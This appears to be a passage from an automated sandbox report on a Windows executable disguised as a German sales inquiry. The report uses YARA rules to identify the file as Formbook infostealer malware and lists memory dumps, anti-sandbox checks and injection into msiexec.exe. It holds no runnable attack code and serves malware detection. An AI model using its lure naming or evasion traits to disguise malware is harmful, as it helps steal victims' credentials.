          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.4514e70.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.44a8a50.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.436c818.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.272500301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.345077926.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.524280240.0000000000C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.271975448.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.344736523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.526116971.0000000001190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.328658941.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.345017455.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.4514e70.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.4514e70.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.44a8a50.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.44a8a50.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.436c818.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.436c818.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.337f2ec.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.272500301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.272500301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.345077926.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.345077926.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.524280240.0000000000C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.524280240.0000000000C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.271975448.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.271975448.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.344736523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.344736523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.526116971.0000000001190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.526116971.0000000001190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.328658941.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.328658941.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.345017455.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.345017455.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.4514e70.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.4514e70.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.44a8a50.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.44a8a50.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.436c818.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.436c818.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.337f2ec.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.524606668.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.309621711.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.272500301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.272500301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.345077926.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.345077926.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.524280240.0000000000C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.524280240.0000000000C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.271975448.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.271975448.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.344736523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.344736523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.526116971.0000000001190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.526116971.0000000001190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.328658941.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.328658941.000000000AB1E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.345017455.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.345017455.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 0_2_0171C2E4
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 0_2_0171E710
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 0_2_0171E700
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 0_2_07D59120
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 0_2_07D50040
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 0_2_07D50006
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041B954
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041C2CA
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041CC68
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_00408C90
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_00402D88
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_00402FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DCD466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D1841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD25DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D1D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D32581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD1D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD2D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D00D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD2EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DCD616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D26E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD1FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD28EC
